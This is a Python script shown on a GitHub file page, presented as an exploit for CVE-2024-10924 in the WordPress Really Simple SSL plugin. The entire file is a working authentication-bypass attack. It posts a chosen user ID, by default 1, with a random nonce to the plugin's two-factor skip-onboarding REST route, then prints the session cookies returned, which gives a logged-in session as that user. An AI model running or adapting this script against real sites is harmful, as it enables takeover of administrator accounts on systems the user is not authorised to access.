-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
executable file
·62 lines (49 loc) · 1.69 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
import argparse
from validator_collection import checkers
import requests
import random
def main():
# Argument parsing
parser = argparse.ArgumentParser(description='Exploit for CVE-2024-10924')
parser.add_argument('-id', type=int, help='User ID (optional)', default=None)
parser.add_argument('url', type=str, help='URL of the target')
args = parser.parse_args()
id = args.id or 1
url = args.url
# Argument validation
if not url:
print('URL is required.')
return
if not url.endswith("/"):
url = f"{url}/"
if not checkers.is_url(url):
print(f'Invalid URL. {url}')
return
# Exploit
success, response = send_request(url, id)
if success:
print('Exploit successful.\n')
print('-' * 50)
print(response)
print('-' * 50)
else:
print(response)
def send_request(url: str, id: int) -> tuple:
"""
Send POST request to target WordPress.
"""
url = f"{url}?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"
headers = {
'Content-Type': 'application/json'
}
data = {
'user_id': id,
'login_nonce': str(random.randint(1000000000, 9999999999)),
"redirect_to": "/wp-admin/"
}
response = requests.post(url, headers=headers, json=data, verify=False)
if response.status_code == 200 and response.headers['Set-Cookie'] is not None and "redirect_to" in response.text and "=deleted;" not in response.headers['Set-Cookie']:
return True, response.headers['Set-Cookie']
return False, "Exploit failed. Maybe the target is not vulnerable or the user ID is incorrect."
if __name__ == "__main__":
main()